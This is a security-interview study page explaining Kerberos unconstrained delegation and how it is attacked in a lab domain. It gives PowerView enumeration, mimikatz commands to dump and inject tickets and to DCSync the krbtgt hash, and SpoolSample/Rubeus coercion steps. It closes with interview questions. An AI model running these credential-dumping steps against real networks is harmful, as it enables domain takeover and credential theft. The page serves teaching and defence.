Interview Bank
  • Interview Bank
  • Web
    • Persistent Connection and Non Persistent
    • CDN
    • Code Review
    • JWT
      • JWT vs Session Based Authentication
      • JWT Challenge
      • JWE
      • JWS
    • Content Security Policy (CSP)
    • Same-origin Policy (SOP)
    • Cross-Origin Resource Sharing (CORS)
      • Exploiting CORS
    • HTTP Strict Transport Security (HSTS)
    • SQL Injection (SQLi)
    • Password Encryption in Login APIs
    • API Security
      • API Principles
    • Simple bypass PHP
    • Server-side Template Injection (SSTI)
    • Javascript Object and Inheritance
    • HTTP/2
    • Cookie vs Local vs session Storage
    • XML External Entity (XXE)
    • What happened when enter domain name in browser
    • Prototype Pollution - Part 1
    • Prototype Pollution - Part 2
    • Nginx vs Apache
  • OT Security
    • Securing Operational Technology: Understanding OT Security
  • Quantum Computing
    • Quantum Computing: Unveiling the Cryptographic Paradigm Shift
    • Quantum Obfuscation: Shielding Code in the Quantum Era
  • DevSecOps
    • Continuous Integration/Continuous Deployment Pipeline Security
    • Chaos Engineering Overview
      • Security Chaos Engineering
    • Mysql VS redis
    • Kubernetes (k8s)
    • How MySQL executes query
    • REDIS
    • Difference between cache and buffer
  • Windows
    • Pentesting Active Directory - Active Directory 101
    • Pentesting Active Directory - Kerberos (Part 1)
    • Pentesting Active Directory - Kerberos (Part 2)
    • AD vs Kerberos vs LDAP
    • Active Directory Certificate Services Part 1
    • Unconstrained Delegation
    • AS-REP Roasting
    • NTLM Relay via SMB
    • LLMRN
    • Windows lateral movement
    • Constrained Delegation
    • Resource-Based Constrained Delegation
    • IFEO (lmage File Execution Options) Hijacking
  • UNIX
    • Setuid
  • Large Language Models (LLMs)
    • Tokens
    • LangChain
    • Integration and Security
  • Android
    • Keystore
  • Red team development
    • Secure C2 Infrastructure
    • P Invoke in c#
    • D Invoke
    • ExitProcess vs ExitThread
  • Blue Team
    • Indicators of Compromise
    • Methods to prevent Email domain spoofing
    • Windows Prefetching
  • CVE
    • XZ Outbreak CVE-2024-3094
    • Log4J Vulnerability (CVE-2021-44228)
    • SolarWinds Hack (CVE-2020-10148)
    • PHP CGI RCE (CVE-2024-4577)
    • Windows Recall
  • Software Architecture
    • Microservices
    • KVM
  • Docker
    • Overview
    • Daemon Socket
    • Tips to reduce docker size
  • Blockchain
    • Overview
    • Smart Contract
  • Business Acumen
    • Market Research Reports and Perception
    • Understanding Acquisitions
    • Cybersecurity as a Business Strategy
  • Cyber Teams
    • Introduction to Purple Teaming
  • Malware
    • Dynamic Sandbox Limitations
Powered by GitBook
On this page
  • Double hop issue
  • Recap
  • Kerberos problem again
  • SO WHY THIS CAUSE PROBLEMS?
  • Attack
  • Enumeration
  • Dump for the tickets in memory
  • What if domain controller didnt visit the web service?
  • Video demo
  • Author
  • Interview question
  1. Windows

Unconstrained Delegation

PreviousActive Directory Certificate Services Part 1NextAS-REP Roasting

Last updated 10 months ago

Double hop issue

Application and data access configurations often require fine-grained permissions, which can create design issues and security misconfigurations. One classic example of this lies in the Kerberos protocol and its authentication mechanism.

For example, consider an internal web server application that is only available to company employees. This web application uses Windows Authentication and retrieves data from a backend database. In this scenario, the web application should only be able to access data from the database server if the user accessing the web application has appropriate access according to Active Directory group membership.

Kerberos does not directly provide a way to accomplish this. When the web application uses Kerberos authentication, it is only presented with the user’s service ticket. This service ticket contains access permissions for the web application, but the web server service account can not use it to access the backend database.

This is known as the Kerberos double-hop issue. Microsoft’s Kerberos delegation solves this design issue and provides a way for the web server to authenticate to the backend database on behalf of the user.

Recap

When a user successfully logs in to a computer, a Ticket Granting Ticket (TGT) is returned. Once the user requests access to a service that uses Kerberos authentication, a Ticket Granting Service ticket (TGS) is generated by the Key Distribution Center (KDC) based on the TGT and returned to the user.

This TGS is then sent to the service, which validates the access. Note that this TGS only allows that specific user to access that specific service. Since the service cannot reuse the TGS to authenticate to a backend service, any Kerberos authentication stops here. Unconstrained delegation solves this with a forwardable TGT.

Kerberos problem again

We begin with an overview of Kerberos authentication

In this case, when a user request access to a service that uses unconstrained delegation, the request also include the forwardable TGT.

Next we are able to send the TGT and the session key into TGS and sends it to the server. Now the frontend service is able to impersonate as us to the backend services.

seems cool solve the double hopping problem.

SO WHY THIS CAUSE PROBLEMS?

Frontend service stores all the tickets into LSASS(Local security Authority Subsystem Service). So it can impersonate authentication to ANY service(Its unconstrained delegation, if its constrained delegation it will only able to access for specific service).

In the event when this frontend is being compromised, attacker is able to dump the memory to retrieve the hashes and impersonate the users and authentication to any services.

Attack

Enumeration

We can enumerate using the PowerView and search in AD which of the workstation has the attribute useraccountcontrol set as "TRUSTED_FOR_DELEGATION"

get-netcomputer -unconstrained

In this screenshot we found the station web.cyberrange.com have the attribute TRUSTED_FOR_DELEGATION

Dump for the tickets in memory

mimikatz# privilege::debug
mimikatz# sekurlsa::tickets /export

This will dump all the ticket out the memoies and pick one of the desied TGT and inject into memory usingkerberos::ptt

mimikatz # sekurlsa::tickets /export
...
Group 2 - Ticket Granting Ticket
[00000000]
 Start/End/MaxRenew: 4/13/2020 5:14:40 AM ; 4/13/2020 3:11:20 PM ; 4/20/2020 5:11:20
AM
 Service Name (02) : krbtgt ; PROD.CORP1.COM ; @ PROD.CORP1.COM
 Target Name (--) : @ PROD.CORP1.COM
 Client Name (01) : admin ; @ PROD.CORP1.COM
 Flags 60a10000 : name_canonicalize ; pre_authent ; renewable ; forwarded ;
forwardable ;
 Session Key : 0x00000012 - aes256_hmac
 517cd6b29bac62711b184487d095507c5231b9d921fa7ae8c52a475edf721474
 Ticket : 0x00000012 - aes256_hmac ; kvno = 2 [...]
 * Saved to file [0;9eaea]-2-0-60a10000-admin@krbtgt-PROD.CORP1.COM.kirbi !
...
mimikatz # kerberos::ptt [0;9eaea]-2-0-60a10000-admin@krbtgt-PROD.CORP1.COM.kirbi
* File: '[0;9eaea]-2-0-60a10000-admin@krbtgt-PROD.CORP1.COM.kirbi': OK

What if domain controller didnt visit the web service?

Its normal that domain controller wont visit the web service(Why would he?).

We could trick a Print server to automatically login against it saving a TGT in the memory of the server. Then, the attacker could perform a Pass the Ticket attack to impersonate the user Print server computer account.

In order to receive the tickets once it force authenticated to us, directly setup a Rebeus monitor session listening for the tickets. Since we are forcing the DC, we should indicate the machine name of the DC(AD1$ in this case)

Now we using spoolSample to perform force authentication.

now switch back to the Rubeus windows, we should receive a ticket from AD1$ with flags forwardable

Use the same ways as above, either use rubeus or use mimikatz to inject the ticket into memory.

mimikatz # lsadump::dcsync /domain:cyberrange.com /user:cyberrange.com\krbtgt

and dumping the krbtgt hash out from DC.

Video demo

Author

Ik0nw

Interview question

1) Explain the Kerberos double-hop issue and how unconstrained delegation solves it.

2) How to configure unconstrained delegation in AD ?

3) What are the security risks associated with unconstrained delegation?

4) If we are using powerview, what command you can issue to find potential unconstrained delegation?

5) Why domain controller have "TRUSTED_FOR_DELEGATION" attribute set?

6) Any mitigations?

To make a print server login against any machine you can use

SpoolSample
90MB
Gitbook.mp4
Rubeus
SpoolSample